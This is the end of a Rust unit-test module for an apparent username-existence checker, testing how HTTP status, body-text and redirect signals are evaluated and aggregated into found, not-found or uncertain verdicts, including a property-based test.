910 let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
911 s.regex_check = Some("^(?![.-])[a-zA-Z0-9_.-]{3,20}$".into());
912 assert!(
913 s.validate().is_ok(),
914 "lookaround-bearing regex should warn, not reject the site"
915 );
916 }
917
918 #[test]
919 fn signal_status_found_votes_only_on_match() {
920 let signal = Signal::StatusFound { codes: vec![200] };
921 let probe = Probe {
922 status: 200,
923 final_url: "https://example.com/alice",
924 body: "",
925 };
926 assert_eq!(signal.evaluate(&probe), SignalVerdict::Found);
927 let probe = Probe {
928 status: 404,
929 ..probe
930 };
931 assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
932 }
933
934 #[test]
935 fn signal_status_not_found_votes_only_on_match() {
936 let signal = Signal::StatusNotFound { codes: vec![404] };
937 let probe = Probe {
938 status: 404,
939 final_url: "",
940 body: "",
941 };
942 assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
943 let probe = Probe {
944 status: 200,
945 ..probe
946 };
947 assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
948 }
949
950 #[test]
951 fn signal_body_absent_votes_not_found_when_text_present() {
952 let signal = Signal::BodyAbsent {
953 text: "Profile not found".into(),
954 };
955 let probe = Probe {
956 status: 200,
957 final_url: "",
958 body: "<h1>Profile not found</h1>",
959 };
960 assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
961 let probe = Probe {
962 body: "<h1>Welcome alice</h1>",
963 ..probe
964 };
965 assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
966 }
967
968 #[test]
969 fn signal_redirect_absent_inspects_final_url() {
970 let signal = Signal::RedirectAbsent {
971 fragment: "/login".into(),
972 };
973 let probe = Probe {
974 status: 200,
975 final_url: "https://example.com/login?next=/alice",
976 body: "",
977 };
978 assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
979 let probe = Probe {
980 final_url: "https://example.com/alice",
981 ..probe
982 };
983 assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
984 }
985
986 #[test]
987 fn aggregate_found_when_only_found_signals_fire() {
988 let kind = aggregate([SignalVerdict::Found, SignalVerdict::Ambiguous]);
989 assert_eq!(kind, MatchKind::Found);
990 }
991
992 #[test]
993 fn aggregate_not_found_when_only_not_found_signals_fire() {
994 let kind = aggregate([SignalVerdict::NotFound, SignalVerdict::Ambiguous]);
995 assert_eq!(kind, MatchKind::NotFound);
996 }
997
998 #[test]
999 fn aggregate_not_found_wins_over_found() {
1000 // Negative-priority: a NotFound vote outranks a Found vote.
1001 let kind = aggregate([SignalVerdict::Found, SignalVerdict::NotFound]);
1002 assert_eq!(kind, MatchKind::NotFound);
1003 }
1004
1005 #[test]
1006 fn aggregate_uncertain_when_no_signals_fire() {
1007 let kind = aggregate([SignalVerdict::Ambiguous, SignalVerdict::Ambiguous]);
1008 assert_eq!(kind, MatchKind::Uncertain);
1009 }
1010
1011 #[test]
1012 fn aggregate_empty_is_uncertain() {
1013 let kind = aggregate(std::iter::empty());
1014 assert_eq!(kind, MatchKind::Uncertain);
1015 }
1016
1017 #[test]
1018 fn needs_body_is_true_only_for_body_signals() {
1019 assert!(!Signal::StatusFound { codes: vec![200] }.needs_body());
1020 assert!(!Signal::StatusNotFound { codes: vec![404] }.needs_body());
1021 assert!(
1022 !Signal::RedirectAbsent {
1023 fragment: "/login".into()
1024 }
1025 .needs_body()
1026 );
1027 assert!(Signal::BodyPresent { text: "x".into() }.needs_body());
1028 assert!(Signal::BodyAbsent { text: "x".into() }.needs_body());
1029 }
1030
1031 #[test]
1032 fn deserializes_signal_list() {
1033 let json = r#"{
1034 "name": "GitHub",
1035 "url": "https://github.com/{username}",
1036 "signals": [
1037 { "kind": "status_found", "codes": [200] },
1038 { "kind": "status_not_found", "codes": [404] }
1039 ]
1040 }"#;
1041 let site: Site = serde_json::from_str(json).unwrap();
1042 assert_eq!(site.name, "GitHub");
1043 assert_eq!(site.signals.len(), 2);
1044 site.validate().unwrap();
1045 }
1046
1047 proptest::proptest! {
1048 /// For any mix of per-signal verdicts, aggregation obeys the
1049 /// negative-priority spec: any NotFound wins; else any Found; else
1050 /// Uncertain.
1051 #[test]
1052 fn aggregate_matches_negative_priority_spec(
1053 votes in proptest::collection::vec(
1054 proptest::prop_oneof![
1055 proptest::strategy::Just(SignalVerdict::Found),
1056 proptest::strategy::Just(SignalVerdict::NotFound),
1057 proptest::strategy::Just(SignalVerdict::Ambiguous),
1058 ],
1059 0..16,
1060 ),
1061 ) {
1062 let kind = aggregate(votes.iter().copied());
1063 let expected = if votes.contains(&SignalVerdict::NotFound) {
1064 MatchKind::NotFound
1065 } else if votes.contains(&SignalVerdict::Found) {
1066 MatchKind::Found
1067 } else {
1068 MatchKind::Uncertain
1069 };
1070 proptest::prop_assert_eq!(kind, expected);
1071 }
1072 }
1073}